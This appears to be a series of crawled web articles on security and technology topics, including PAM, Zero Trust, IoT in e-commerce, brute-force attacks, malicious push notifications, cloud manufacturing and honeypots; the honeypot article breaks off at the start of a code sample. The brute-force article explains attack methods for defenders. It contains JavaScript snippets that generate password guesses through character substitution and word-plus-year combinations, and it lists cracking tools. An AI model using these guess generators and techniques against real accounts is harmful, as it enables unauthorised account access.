How Does PAM Security Prevent Cyberattacks?
PAM tools are crucial to increasing security, protecting businesses from hackers, and preventing cyberattacks.
Like all people, privileged users, such as domain administrators, struggle to remember passwords across their various account logins. They are also a major target for cyber criminals, which means they especially need to use strong passwords and not recycle credentials over different accounts. PAM solutions monitor privileged accounts and store them in a digital vault to reduce the risk of cyberattacks.
A privileged access management solution reduces the need for users to remember multiple passwords and allows super users to manage privileged access from one location, instead of using multiple applications and systems. It also helps organizations prevent insider attacks by former employees with access rights that have not been effectively deprovisioned. Alerts and session management also allow super admins to identify threats in real time.
Another key advantage is that it ensures compliance with ever-stringent data and privacy regulations. PAM encourages organizations to restrict access to sensitive data and systems, require further approvals, and deploy additional security tools like multi-factor authentication (MFA) on privileged accounts. PAM auditing tools also provide businesses with a clear audit trail, which is crucial to meeting regulations like the EU General Data Protection Regulation (GDPR), the Federal Information Security Management Act (FISMA), and the Health Insurance Portability and Accountability Act (HIPAA).
How Is PAM Different from Identity Access Management (IAM)?
PAM is a subset of IAM, which is a framework of processes, policies, and technologies that allow organizations to manage their digital identities. With IAM, organizations can authenticate and authorize all of their users—including internal employees, external customers, partners, and vendors—across their entire attack surface and tools like Active Directory.
PAM systems are specifically focused on managing and securing administrators and users with elevated privileges.
IAM Can Strengthen PAM Solutions
Organizations must deploy and integrate both IAM and PAM to effectively prevent cyberattacks. Integrating them reduces security risks, improves user experience, and is listed as a requirement by auditors and regulators. Other tools that are crucial to IAM, such as MFA, can be used for secure access, which is necessary to meeting compliance requirements set out by standards like the Payment Card Industry Data Security Standard (PCI DSS).
Using IAM as the interface also improves privileged users’ experience. It enables them to access PAM from the same location they use to access all other corporate resources. Furthermore, IAM enables organizations to automatically terminate privilege access when users leave the organization, which is not always the case with privileged access management tools.
How Fortinet Can Help
The Fortinet IAM solutions allow organizations to securely confirm their users and devices when they enter the corporate network. It also enables them to control and manage identities and ensure only the right users have access to the right resources.
The solution includes FortiAuthenticator, which prevents unauthorized access to resources. Combined with FortiToken and FortiToken Cloud, the Fortinet IAM tool provides further confirmation of user identities and enables MFA processes and management. All these help organizations address the common challenges that companies face in the evolving threat landscape.

Source: https://www.fortinet.com/tw/resources/cyberglossary/privileged-access-management
Cybersecurity and Healthcare have a lot in common which isn’t immediately visible to the average eye. Take, for instance, the ‘Response Plan’ in case of an incident. Identification of the breach is usually the first step in case of a cybersecurity incident. This is followed by containment, eradication, and recovery. Similarly, a Health incident response plan is brought into effect after the identification of Patient or Ground Zero. Then the patient is quarantined to contain the further spread of the pathogen followed by efforts to eradicate the disease.
Today, the two fields have been brought to the forefront of global discourse for all the wrong and most tragic reasons. In the process, a new, indirect link between them has been exposed. As we all know, the novel Coronavirus, apparently having jumped from animals to humans, has taken the lives of more than 100,000 people. This spectacle of death has forced all of humanity to suspend daily activities and stay at home. To ensure undisrupted productivity, however, enterprises have been forced to ask employees to work remotely. This has been enabled by the growth of technologies such as the Internet and cloud-based services over the past decade. With remote work being the new normal for now, cybersecurity has never been a greater issue. The average employee is susceptible to innumerable malicious attacks as they access sensitive company data with multiple insecure devices. The fear the common man has for the novel Coronavirus is also being exploited by malicious actors through phishing campaigns and whatnot. Overall, cybersecurity issues have come to the fore as never before.
Traditionally, a remote worker uses a VPN to establish access to the corporate network. VPNs are intended to secure the connection and at the same time grant access. However, there is an issue with VPNs in particular, and the current enterprise security architecture at large: trust. With a single pair of credentials obtained unlawfully, someone can lay siege to the entire corporate network. This is because the network considers anything or anyone within the perimeter (usually the firewall) of the network to be trustworthy. A typical castle-and-moat situation. Once within the perimeter, a malicious actor can go into reconnaissance mode and take down the entire network, system by system.
So, if trust is the issue here, why not eliminate it? Don’t trust anybody, within or without the firewall. This suggestion might sound crude. It is the equivalent of destroying the television just because you couldn’t tune into a channel. But this idea, called the Zero Trust Security Model, has gone on to become one of the hottest topics in Cybersecurity.
Zero Trust is a security strategy founded on a set of concepts and ideas which collectively suggest only one thing: No one is to be trusted. In a classical network, trust is placed upon the user with the login credentials and access is granted. For all we know, this ‘user’ might be an attacker with stolen credentials, resulting in end-point data theft. Hence, the system must treat each user with Zero Trust. The security plan developed for an organization with this basic principle in mind is known as the Zero Trust Architecture.
Zero Trust Architectures may be deployed in different ways. One common implementation considers the identity of both the user and the device. Additional data such as device certificates are also taken into account. The credentials are checked and cross-verified before access is granted to resources. Any discrepancies in the data usually limit the access granted to the user. The simplest form of such a model is the now ubiquitous and heavily in-demand Multi-factor Authentication (MFA) system.
Another popular implementation involves Micro-segmentation of resources with the use of Next-Generation Firewalls as gateways. This model identifies the key resources of the organization and a layer of protection is created around those resources. Simply put, each resource has its own shield against threats.
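That per-resource gating idea can be sketched in a few lines; the resource names and allow-list structure below are invented for illustration:

```javascript
// Each protected resource gets its own allow-list: a "shield" per resource,
// instead of one trusted zone behind a single perimeter firewall.
const policy = {
  "payroll-db": ["hr-app"],
  "build-server": ["ci-agent", "release-bot"],
};

function allowed(sourceIdentity, resource) {
  // Default deny: unknown resources and unknown sources get no access.
  return (policy[resource] || []).includes(sourceIdentity);
}
```

The point of the default deny is that nothing inside the network is implicitly trusted; every source must appear on a resource's own list.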
Zero Trust Networks can be built using technologies that are already in common use today. RSA Certificates for Encryption, Multifactor Authentication Systems are some examples. In fact, most public SaaS offerings are already Zero Trust configured. So, if you use cloud services such as Office 365, you may already partly be Zero Trust ready.
Cloud security is a major issue that the Zero Trust Architecture is expected to solve. Most enterprises, these days, deploy their applications and systems in different settings. While some may be hosted in the private data centre, others may be present in public or hybrid clouds. Different security measures are adopted for each deployment. This can cause headaches for information security personnel and leave in its wake a fragmented security architecture. A solid Zero Trust Architecture needs to be implemented in such a setting.
Transitioning a large enterprise that is highly dependent on legacy access control systems to a Zero Trust Architecture is definitely a huge ask. It requires the combined efforts of people from all walks of corporate life: right from the CISO to System Administrators. But the benefits that an enterprise will reap by investing in Zero Trust are huge. MFA and Single Sign On (SSO) will enhance the user experience as employees won’t have to jot down their passwords again. Security Administrators will have greater visibility into network traffic. The returns outweigh the initial investment. Major companies such as Google and Coca-Cola have embraced Zero Trust. Even the United States House of Representatives has advocated the use of Zero Trust. While it may be tough making a transition, I anticipate that renewed interest and vigour in Cybersecurity, along with the widespread adoption of cloud-based infrastructure services and the ever-multiplying commercial solutions, will surely make things easier in the near future.
Zero Trust is definitely the security architecture of the future. It can only serve well if companies view Zero Trust not only as a technological solution, but also as a strategy and, more importantly, a mindset. This approach is important as we march ahead to a future where all devices will be interconnected in the Internet of Things.
The novel Coronavirus so far has made us introspect deeply. Fundamental questions about human nature and society are being asked everywhere as we deeply reflect on what’s important in life. It has also given us the time to appreciate people better. As we celebrate the services of doctors, nurses and all healthcare workers, let us also take the time to appreciate the low-profile Healthcare Sysadmins. | <urn:uuid:6790c1e6-0304-49bc-9b7f-75d1e055f22e> | CC-MAIN-2022-40 | https://blog.admindroid.com/why-having-zero-trust-in-your-cybersecurity-is-a-good-thing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00562.warc.gz | en | 0.958159 | 1,311 | 2.546875 | 3 |
As consumers migrate from physical stores to online stores, it is paramount that players in this industry evolve to match their pace. To do that, eCommerce stores need to seek innovative ways to make consumers’ experiences as enjoyable as possible and enhance their loyalty. This is where the Internet of Things (IoT) comes into play. If you are curious about the uses of the Internet of Things in e-commerce and its meaning, then keep reading to learn more! For more information on the benefits of IoT in eCommerce, check the EPAM Anywhere blog.
The Internet of Things describes devices with software, sensors, processing ability and other technologies capable of connecting and interacting with other devices over the internet.
Devices with IoT applications exchange data with each other within an internet network which aids the e-commerce companies in these areas below:
IoT sensors and Radio Frequency Identification (RFID) tags have changed the inventory management approach entirely. These tags and sensors allow essential item information, like a product’s availability, its expiration date and the type of product, to be captured without the need to involve any human.
For customers, the sensors and tags allow them to confirm a product’s availability, and they aid business owners in monitoring the quality and quantity of an item. Smart shelves make inventory management much easier by inspecting the number of items and placing an order for new batches to prevent the item from going out of stock.
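The reorder logic a smart shelf automates can be sketched as follows; the field names, threshold and batch-size policy are assumptions for illustration, not any vendor's API:

```javascript
// Reorder any SKU whose on-shelf count has dropped below the threshold,
// topping it back up to the target batch size.
function reorderDecisions(shelfItems, threshold, batchSize) {
  return shelfItems
    .filter((item) => item.count < threshold)
    .map((item) => ({ sku: item.sku, orderQty: batchSize - item.count }));
}
```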
IoT devices ensure detailed and accurate tracking of product journeys in the process of Supply Chain Management. The RFID tags and IoT sensors help businesses stay updated with news about the product, from the location to the conditions. It provides precise arrival time and prevents wrong deliveries.
The devices also allow customers to keep track of the product location and arrival time at their doorstep. It can automate the delivery and shipping processes to avoid issues like missing shipments.
IoT combines company data and personal data to provide customers with customized services. Some Retailers use customers’ social connections to offer more customized activities, information and data integration for homes or individual members to serve their customers better.
For instance, a connected car driver will get offers suited to them. Customers’ purchase choices might be influenced throughout the customer journey as Internet of Things app engineers gain better access to consumer behavior insights.
Using IoT in eCommerce, sellers have gained better insight into the process of order fulfilment so they can satisfy their online customers’ needs. For online companies, Internet of Things (IoT) technology keeps track of customers’ orders from the start (the time they are placed) to finish (their arrival at their doorsteps). Retailers can now track all items in the inventory, irrespective of location. IoT can also help avoid traffic delays: GPS trackers are capable of detecting traffic and offering alternative routes.
Data like weather, traffic conditions, and employees’ identities and locations can be accessed by employing cloud-based technologies such as GPS and RFID.
Thanks to linked appliances, manufacturers and consumers can enjoy a long-term relationship. For example, printer producers might directly offer printer cartridge replacements. Consumers will then recall the brand’s name even after they stop using the products.
Retailers can also, through IoT, build brand-new business models, like remote monitoring, performance analytics, and predictive maintenance for different items, which can bring in new income streams.
Internet of Things (IoT) allows e-commerce businesses to stand out amongst their rivals. Different companies are using this to gather insights on items that are becoming popular on social media. IoT technology allows retailers to offer a more inclusive shopping experience with increased customization to suit their customers.
It can seamlessly help in tailored marketing and advertising, enabling e-commerce businesses to concentrate on a particular group of consumers. Also, it can accurately discover different shopping patterns through online browsing and search trends, enabling businesses to sell selected items to their numerous consumers with little or no difficulty.
One of the major implementations of the Internet of Things in e-commerce is utilizing it to discover and eliminate different issues like cart abandonment, missing shipments, low engagement and return rate. This can be achieved by collecting and analyzing data, strengthening supply chain management and improving customer experience.
Performance analytics plays an integral role in ecommerce. With performance analytics, companies can notice if all the units meet their KPIs and when there is an issue with the outflow and inflow of driving patterns, customers’ location, products and other statistics.
IoT technologies can serve as tools for remote assessment of items, forecasting their maintenance, and examining their performance. They provide businesses with extra data regarding the adoption of a product and also help prevent breakdowns.
If the sensors alert the company that a product is operating poorly, the company can contact the customer and offer to replace or repair the product to avoid any future difficulties. In case of a stolen or lost item, IoT can send a notification to alert the user.
Thanks to IoT in e-commerce, business solutions and models are being re-strategized, giving way to new ones. Companies can now increase revenue, create compelling use cases and reduce time to market. IoT applications in eCommerce can change the way companies communicate with their consumers all around the globe.
IoT has given a boost to eCommerce businesses thanks to the availability of microchips, sensors and actuators. Consumer experience will keep improving as more gadgets connect to the internet, acquire smart features, and gather more data.
IoT allows companies to see an increase in revenue, track losses and thefts, and customize the customer experience. Simply put, the benefits of the Internet of Things in e-commerce are evolutionary! | <urn:uuid:10f81da7-4c88-476e-9814-e9dd4ba7bb32> | CC-MAIN-2022-40 | https://coruzant.com/iot/10-innovative-uses-of-internet-of-things-in-e-commerce/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00562.warc.gz | en | 0.927858 | 1,168 | 2.78125 | 3 |
What is a Brute Force Attack?
A brute force attack uses a trial-and-error approach to systematically guess login info, credentials, and encryption keys. The attacker submits combinations of usernames and passwords until they finally guess correctly.
Once successful, the actor can enter the system masquerading as the legitimate user and remain inside until they are detected. They use this time to move laterally, install back doors, gain knowledge about the system to use in future attacks, and, of course, steal data.
Brute force attacks have been around as long as there have been passwords. They not only remain popular, but are on the rise due to the shift to remote work.
Types of brute force attacks
Simple brute force attack
A simple brute force attack uses automation and scripts to guess passwords. Typical brute force attacks make a few hundred guesses every second. Simple passwords, such as those lacking a mix of upper- and lowercase letters and those using common expressions like ‘123456’ or ‘password,’ can be cracked in minutes. However, the potential exists to increase that speed by orders of magnitude. All the way back in 2012, a researcher used a computer cluster to guess up to 350 billion passwords per second.
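The arithmetic behind those numbers is simple: worst-case cracking time is the size of the keyspace divided by the guess rate. A quick back-of-the-envelope calculator:

```javascript
// Worst-case seconds to exhaust every password of a given length
// drawn from an alphabet of a given size.
function secondsToCrack(alphabetSize, length, guessesPerSecond) {
  return Math.pow(alphabetSize, length) / guessesPerSecond;
}

// 8 lowercase letters (26^8, about 2.1e11 combinations) at 1 billion
// guesses per second falls in under four minutes; mixing in uppercase,
// digits and symbols (roughly 95 characters) multiplies the keyspace
// by tens of thousands at the same length.
const lowercaseOnly = secondsToCrack(26, 8, 1e9); // about 209 seconds
```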
A dictionary attack tries combinations of common words and phrases. Originally, dictionary attacks used words from a dictionary as well as numbers, but today dictionary attacks also use passwords that have been leaked by earlier data breaches. These leaked passwords are available for sale on the dark web and can even be found for free on the regular web.
Dictionary software is available that substitutes similar characters to create new guesses. For example, the software will replace a lowercase “l” with a capital “I” or a lowercase “a” with an “@” sign. The software only tries the combinations its logic says are most likely to succeed.
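The substitution logic such software applies can be illustrated with a tiny candidate generator; the substitution table here is a small sample, and real tools ship much larger rule sets:

```javascript
// A few common character substitutions; each letter maps to the set
// of characters it may be replaced with (including itself).
const SUBS = { a: ["a", "@"], l: ["l", "I"], o: ["o", "0"], e: ["e", "3"] };

// Expand a dictionary word into every substitution variant.
function variants(word) {
  let results = [""];
  for (const ch of word.toLowerCase()) {
    const options = SUBS[ch] || [ch];
    results = results.flatMap((prefix) => options.map((o) => prefix + o));
  }
  return results;
}
```

A three-letter word where every letter has two options already yields eight candidates, which is why rule-based generators stay far cheaper than raw brute force.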
Over the years, more than 8.5 billion usernames and passwords have been leaked. These stolen credentials are sold between bad actors on the dark web and used in everything from spam to account takeovers.
A credential stuffing attack uses these stolen login combinations across a multitude of sites. Credential stuffing works because people tend to re-use their login names and passwords repeatedly, so if a hacker gets access to a person’s account with an electric company, there is an excellent chance those same credentials will provide access to that person’s online bank account as well.
Gaming, media, and retail businesses tend to be favorite targets, but credential stuffing attacks are commonly launched against all industries.
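Defenders can turn the same insight around and refuse credentials that already appear in breach dumps. A toy, in-memory version follows; the example entries are invented, and production systems compare hashes against large breach corpora rather than plaintext lists:

```javascript
// Toy breach-reuse check. Real services never store plaintext pairs;
// they check hashed passwords against breach datasets.
const leakedPairs = new Set([
  "alice@example.com:hunter2",
  "bob@example.com:123456",
]);

function isKnownLeakedPair(email, password) {
  return leakedPairs.has(`${email.toLowerCase()}:${password}`);
}
```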
Reverse Brute Force Attack
In a regular brute force attack, the attacker starts with a known key, usually a username or account number. Then they use automation tools to figure out the matching password. In a reverse brute force attack, the attacker knows the password and needs to find the username or account number.
Hybrid Brute Force Attack
A hybrid brute force attack combines a dictionary attack and a brute force attack. People often tack a series of numbers – typically four – onto the end of their password. Those four numbers are usually a year that was significant to them, such as a birth or graduation year, and so the first number is normally a 1 or a 2.
In a hybrid brute force attack, attackers use the dictionary attack to provide the words and then automate a brute force attack on the last part – the four numbers. This is a more efficient approach than using a dictionary attack alone or a brute force attack alone.
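Generating candidates for that word-plus-year pattern takes only a few lines, which is part of why the hybrid approach is so efficient. A sketch:

```javascript
// Combine dictionary words with a brute-forced 4-digit year suffix.
function hybridCandidates(words, startYear, endYear) {
  const candidates = [];
  for (const word of words) {
    for (let year = startYear; year <= endYear; year++) {
      candidates.push(word + year);
    }
  }
  return candidates;
}
```

Fifty years per word multiplies the dictionary by only 50, instead of the 10,000 combinations a blind four-digit suffix search would need.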
Traditional brute force attacks try to guess the password for a single account. Password spraying takes the opposite approach and tries to apply one common password to many accounts. This approach avoids getting caught by lockout policies that limit the number of password attempts. Password spraying is typically used against targets with single sign-on (SSO) and cloud-based apps that use federated authentication.
A brute force attack is a numbers game, and it takes a lot of computing power to execute at scale. By deploying networks of hijacked computers to execute the attack algorithm, attackers can save themselves the cost and hassles of running their own systems. In addition, the use of botnets adds an extra layer of anonymity. Botnets can be used in any type of brute force attack.
Motives Behind Brute Force Attacks
Attackers can use brute force attacks to:
- steal sensitive data
- spread malware
- hijack systems for malicious purposes
- make websites unavailable
- profit from ads
- reroute website traffic to commissioned ad sites
- infect sites with spyware in order to collect data to sell to advertisers
The level of technological skill required to launch a credential stuffing attack is extremely low, as is the cost. For as little as $550, anyone with a computer can launch a credential stuffing attack.
How Does a Brute Force Attack Work?
Adversaries use automated tools to execute brute force attacks, and those lacking the skill to build their own can purchase them on the dark web in the form of malware kits. They can also purchase data such as leaked credentials that can be used as part of a credential stuffing or hybrid brute force attack. These lists may be offered as part of a package, in which the seller includes the lists along with the automated tools, as well as other value-adds, such as management consoles.
Once the attacker sets up their tools and seeds them with the lists, if relevant, the attack begins.
Brute force attacks can be conducted with botnets. Botnets are systems of hijacked computers that provide processing power without the consent or knowledge of the legitimate user. Like the malware kits mentioned above, bot kits can also be purchased on the dark web. Last year, a botnet was used to breach SSH servers belonging to banks, medical centers, educational institutions, and others.
Brute force attacks are resource-intensive, but effective. They may also be the first part of a multi-stage attack. An example of this is explained in detail on the CrowdStrike blog, examining a case where a brute force attack was part of a multi-step exploit that enabled unauthenticated privilege escalation to full domain privileges.
Tools Used for Brute Force Attacks
Tools, many free, are available on the open internet that work against a wide variety of platforms and protocols. Here are just a few:
- Aircrack-ng: Aircrack-ng is a brute force wifi password tool that is available for free. It comes with WEP/WPA/WPA2-PSK cracker and analysis tools to perform attacks on Wi-Fi 802.11 and can be used for any NIC that supports raw monitoring mode.
- DaveGrohl: DaveGrohl is a brute forcing tool for Mac OS X that supports dictionary attacks. It has a distributed mode that enables an attacker to execute attacks from multiple computers on the same password hash.
- Hashcat: Hashcat is a free password cracking tool that supports both CPU- and GPU-based cracking. It works on Windows, macOS, and Linux systems, and works in many types of attacks, including simple brute force, dictionary, and hybrid.
- THC Hydra: THC Hydra cracks passwords of network authentications. It performs dictionary attacks against more than 30 protocols, including HTTPS, FTP, and Telnet.
- John the Ripper: This is a free password-cracking tool that was developed for Unix systems. It is now available for 15 other platforms, including Windows, OpenVMS, and DOS. John the Ripper automatically detects the type of hashing used in a password, so it can be run against encrypted password storage.
- L0phtCrack: L0phtCrack is used in simple brute force, dictionary, hybrid, and rainbow table attacks to crack Windows passwords.
- NL Brute: An RDP brute-forcing tool that has been available on the dark web since at least 2016.
- Ophcrack: Ophcrack is a free, open source Windows password cracking tool. It uses LM hashes through rainbow tables.
- Rainbow Crack: Rainbow Crack generates rainbow tables to use while executing an attack. Rainbow tables are pre-computed and so reduce the time required to perform an attack.
What is the Best Protection Against Brute Force Attacks?
Use multifactor authentication
When users are required to offer more than one form of authentication, such as both a password and a fingerprint or a password and a one-time security token, a brute force attack is less likely to succeed.
Implement IT hygiene
Gain visibility into the use of credentials across the environment and require passwords to be changed regularly.
Set up policies that reject weak passwords
Longer passwords are not always better. What really helps is to require a mix of upper- and lowercase letters mixed with special characters. Educate users on best password practices, such as avoiding adding four numbers at the end and avoiding common numbers, such as those beginning with 1 or 2. Provide a password management tool to prevent users from resorting to easily remembered passwords, and use a discovery tool that exposes default passwords on devices that haven’t been changed.
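A policy like the one described can be enforced with a simple validator. The exact thresholds and rules below are illustrative choices, not a standard:

```javascript
// Reject passwords that are short, single-case, digit-free, symbol-free,
// or that end in the predictable 4-digit year pattern described above.
function isAcceptablePassword(pw) {
  if (pw.length < 12) return false;
  if (!/[a-z]/.test(pw) || !/[A-Z]/.test(pw)) return false; // mixed case
  if (!/[0-9]/.test(pw)) return false;                      // a digit
  if (!/[^A-Za-z0-9]/.test(pw)) return false;               // a special char
  if (/(19|20)\d{2}$/.test(pw)) return false;               // trailing year
  return true;
}
```

Pairing a check like this with a password manager is usually more effective than the check alone, since it keeps users from falling back to memorable patterns.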
Implement proactive threat hunting
Threat hunting can expose the types of attacks that standard security measures can miss. If a brute force attack has been used to successfully enter the system, a threat hunter can detect the attack even though it’s operating under the guise of legitimate credentials. | <urn:uuid:41a82af0-04e9-479c-9eb7-3f8853c833ed> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/brute-force-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00562.warc.gz | en | 0.921392 | 1,957 | 3.5 | 4 |
Malicious Browser Push Notifications
Browser Push Notifications: Push notifications are small, permission-based messages that notify users of new messages or updated content, and they can reach large audiences anywhere at any time. Desktop notifications are visual notifications that appear on your screen alerting you to new messages from visitors in an app; they are shown even if you are browsing a different website or tab in another app.
Push notifications act differently than website pop-ups because they are independent of sites. Push notifications are associated with web browsers and apps and can be used with both desktop and mobile versions of web browsers.
Mozilla – “Web Push allows websites to notify users of new messages or updated content. While Firefox is open, websites who have been granted permissions can send notifications to your browser and display them on the screen. Users can easily allow or disable notifications and control how these notifications appear.”
The web notification opt-in process
Web notifications are a permission-based marketing channel. Before receiving a web push, users have to opt in to receive them.
The opt-in prompt comes from the user’s web browser. This prompt is called a browser-level opt-in prompt, or browser-based prompt.
Brands can handle the opt-in process in different ways with both the opt-in process and the timing of the opt-in ask.
Push notifications can be really useful when they are used correctly to increase the conversion rate of a website or app; however, they can be abused using various social engineering methods. Today we will take a look at some of the methods hackers are using to abuse web push notifications.
Push notifications can be used to promote spam and misleading content. Recycling blog posts is not a bad thing, although it can become quite annoying seeing the same push notifications promoting content you have already read.
The Notifications API
Push notifications are handled externally using the Notifications API.
“The Notifications API lets a web page or app send notifications that are displayed outside the page at the system level; this lets web apps send information to a user even if the application is idle or in the background.”
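On the client side, a permission-respecting opt-in flow looks roughly like this. The soft-prompt helper is our own illustrative logic; `Notification.permission` and `Notification.requestPermission()` are the real browser API:

```javascript
// Only ask when the user hasn't decided yet; re-prompting users who
// already denied is both hostile and blocked by most browsers.
function shouldPrompt(permissionState) {
  return permissionState === "default";
}

async function optIn() {
  if (typeof Notification === "undefined") return "unsupported"; // non-browser
  if (!shouldPrompt(Notification.permission)) return Notification.permission;
  return Notification.requestPermission(); // triggers the browser-level prompt
}
```

Deferring `optIn()` until a user gesture (rather than firing it on page load) is also what browsers increasingly require for the prompt to appear at all.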
Due to the nature of the Notifications API, hackers will often target push notification software using various social engineering techniques such as phishing, password reuse, and watering hole attacks, with the main goal of hijacking the account that handles push notifications. This would allow the hacker to potentially send malicious push notifications to all push subscribers externally, regardless of whether the website or blog is functioning correctly or is online. If you are sending push notifications to your users, make sure that you are using a strong password and 2FA logins in your marketing software.
Social Engineering Browser Push Notifications
Hackers have started to target push notifications via social engineering methods. Social engineers abuse push notifications to gain more push subscribers by overlaying and embedding convincing permission buttons inside video and music content, tricking users into thinking they are clicking ‘Allow’ to play the video or music on the website or to confirm their age.
The Push-notification.tools pop-ups are a social engineering attack that tries to trick users into subscribing to its push notifications so that they can send unwanted advertisements directly to your desktop.
Push notifications can also be abused to inflate a site’s traffic analytics score by recycling content and driving users back to the website an excessive number of times. This makes it look as if there are a lot more recurring users.
Even though many of the websites and blogs using push notifications are secured by SSL/HTTPS certificates, hackers could still send push notifications externally that promote a less secure website hosting malicious content, malicious code, or links to unencrypted malicious websites.
Browser Push Notifications and marketing
Often push notifications will not be self-hosted, as they can be hard to manage and can cause a lot of performance issues on servers. There are many companies on the market offering push notifications for free. How do these companies offer such a lucrative service for free? Some marketing companies will sell marketable user data to the highest bidder.
There are a lot of genuine companies offering push notification services that are transparent about the data they collect. But that is not the case for others, so always look into the terms and conditions before installing any push notification plugins for your website or blog.
Cloud Networked Manufacturing
Cloud Computing provides a new way to do business by offering a scalable, flexible service over the Internet. Many organizations, such as educational institutions and business enterprises, have adopted cloud computing as a means to boost both employee and business productivity. Similarly, manufacturing companies have found that they may not survive in the competitive market without the support of Information Technology (IT) and computer-aided capabilities. The advent of new technologies has changed the traditional manufacturing business model. Nowadays, collaboration between dispersed factories, different suppliers and distributed stakeholders, in a quick, real-time and effective manner, is significant. Cloud manufacturing, as a new form of networked manufacturing, encourages collaboration in any phase of manufacturing and product management. It provides secure, reliable manufacturing lifecycle and on-demand services at low prices through networked systems.
In the literature, there are various definitions of Cloud manufacturing (CM). For example, Li, Zhang and Chai (2010) defined cloud manufacturing as “a service-oriented, knowledge-based smart manufacturing system with high efficiency and low energy consumption”. In addition, Xu (2012) described Cloud Manufacturing as “a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable manufacturing resources (e.g., manufacturing software tools, manufacturing equipment, and manufacturing capabilities) that can be rapidly provisioned and released with minimal management effort or service provider interaction“. According to Tao and his colleagues (2011), one of the key characteristics of cloud manufacturing is service-oriented. Manufacturing resources and abilities can be virtualized and encapsulated into different manufacturing cloud services such as Design as a service (DaaS), Manufacturing as a service (MFGaaS), Experimentation as a service (EaaS), Simulation as a service (SIMaaS), Management as a service (MaaS), Maintain as a service (MAaaS), Integration as a service (INTaaS). Cloud users can use these services based on their requirements via the wide Internet.
Furthermore, Cloud manufacturing can provide various and dynamic resources, services, and solutions for addressing a manufacturing task. Like Wikipedia, Cloud manufacturing is a group innovation-based manufacturing model. Any person or company can participate in and contribute their manufacturing resources, abilities, and knowledge to a cloud manufacturing service platform. Besides, any company can use these resources, abilities and knowledge to carry out its manufacturing actions. It would seem that within a Cloud manufacturing environment, an enterprise does not need to possess the entire hardware manufacturing environment (such as workshop, equipment, IT infrastructures, and personnel) or the software manufacturing ability (such as design, manufacturing, management, and sales ability). An enterprise can obtain the resources and abilities, and services in Cloud manufacturing platform according to its requirements after payment.
Cloud Manufacturing consists of four kinds of cloud manufacturing service platform which are:
- Public CM service platform: manufacturing resources and abilities are shared with the general public in a multi-tenant environment.
- Private CM service platform: manufacturing resources and abilities are shared within one company or its subsidiaries. It is managed by an organization or enterprise to provide greater control over its resource and service.
- Community CM service platform: manufacturing resources and abilities are controlled and used by a group of organizations with common concerns.
- Hybrid CM service platform: it is a composition of public and private cloud. Services and information which are not critical are stored in Public CM, while critical information and services are kept within the private CM.
Cloud manufacturing consists of technologies such as networked manufacturing, manufacturing grid (MGrid), virtual manufacturing, agile manufacturing, Internet of things and cloud computing. It can reduce cost of production and improve production efficiency, distribution of integrated resources, and resource efficiency.
By Mojgan Afshari
Mojgan Afshari is a senior lecturer in the Department of Educational Management, Planning and Policy at the University of Malaya. She earned a Bachelor of Science in Industrial Applied Chemistry from Tehran, Iran. Then, she completed her Master’s degree in Educational Administration. After living in Malaysia for a few years, she pursued her PhD in Educational Administration with a focus on ICT use in education from the University Putra Malaysia. She currently teaches courses in managing change and creativity and statistics in education at the graduate level. | <urn:uuid:fa6a4a68-5a36-4267-a093-f2dfc1901405> | CC-MAIN-2022-40 | https://cloudtweaks.com/2014/08/cloud-networked-manufacturing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00562.warc.gz | en | 0.94555 | 874 | 2.625 | 3 |
Routers are network devices that connect your network to the internet. When a router receives packets, it reads the destination network address and decides where to forward them. Most people are familiar with home and small-office routers, but larger companies may also run enterprise routers, which offer far more ports and connect directly to the internet backbone.
Scanned Router Information
Lansweeper will retrieve all information it can find from your router, including:
- Manufacturer and Model
- Serial number
- Device description if available
- Network interfaces
When looking for router information, you are usually looking for the network interfaces. Here, Lansweeper shows the different ports and whether they are in use. For each port, Lansweeper will show the description, type, bandwidth, maximum transmission unit (MTU) and of course the IP address. | <urn:uuid:14272cad-a59e-43ac-886b-f3c10450e549> | CC-MAIN-2022-40 | https://www.lansweeper.com/asset/router/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00562.warc.gz | en | 0.913681 | 176 | 3.21875 | 3 |
A smart network security administrator is one who can put measures in place to neutralize threats before they ever take place. To stay ahead of attackers, network security professionals keep certain decoy systems in their arsenal. One popular decoy system, designed to entice targets and misdirect attackers away from their real objective, is the honeypot.
A honeypot can be built with a range of complexities, depending on what your organization actually requires. A honeypot can be a crucial line of defence in network security, so here we will focus on the different types of honeypots, their benefits, and how they are employed.
Honeypots help in spotting early signs of an attack: what type of information is vulnerable, who the attackers are, and what methods they use. Honeypots are closely monitored and contain no genuinely sensitive data. They help in analysing the attackers' TTPs (tactics, techniques, and procedures) and in accumulating legal and forensic evidence without putting the real network at stake.
How a Honeypot Works
To successfully deploy a honeypot in network security, the entire system must appear legitimate. It should hold dummy files that make it look valuable on the surface. Security designers usually place it just behind the corporate firewall. A honeypot is configured to block outgoing traffic, so that attackers cannot use it as a stepping stone toward other internal assets.
In terms of purpose, honeypots are classified into two types: research honeypots and production honeypots.
- Research honeypots gather information on attacks and examine malicious behaviour to inform future pre-emptive measures.
- Production honeypots, on the other hand, primarily detect compromises of the internal network and then trick the invader.
As their roles suggest, research honeypots are more complex and carry additional forms of data than production honeypots. Honeypots are also classified by their level of interaction:
- Pure Honeypot: A full-scale replica of a production system that runs on different servers. It has comprehensive sensors and carries dummy “confidential” data and user details.
- High-Interaction Honeypot: It is used by the security analyst to observe attacker’s techniques and behaviour pattern. These types of honeypot are quite resource-intensive and demand more maintenance, but can deliver worthwhile findings.
- Mid-Interaction Honeypot: These do not possess their own operating system and are primarily used to confuse attackers, buying the security team time to react to the breach.
- Low-Interaction Honeypot: This form of honeypot in network security is widely deployed while creating a production environment. It is used for advanced warning spotting mechanism. They are quite simple to deploy and maintain.
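At its core, a low-interaction honeypot is little more than a listener that accepts connections on a fake service port, logs who knocked, and hands back a plausible banner. Here is a minimal Python sketch; the FTP-style banner and the threading layout are illustrative assumptions, not a production design:

```python
import socket
import threading
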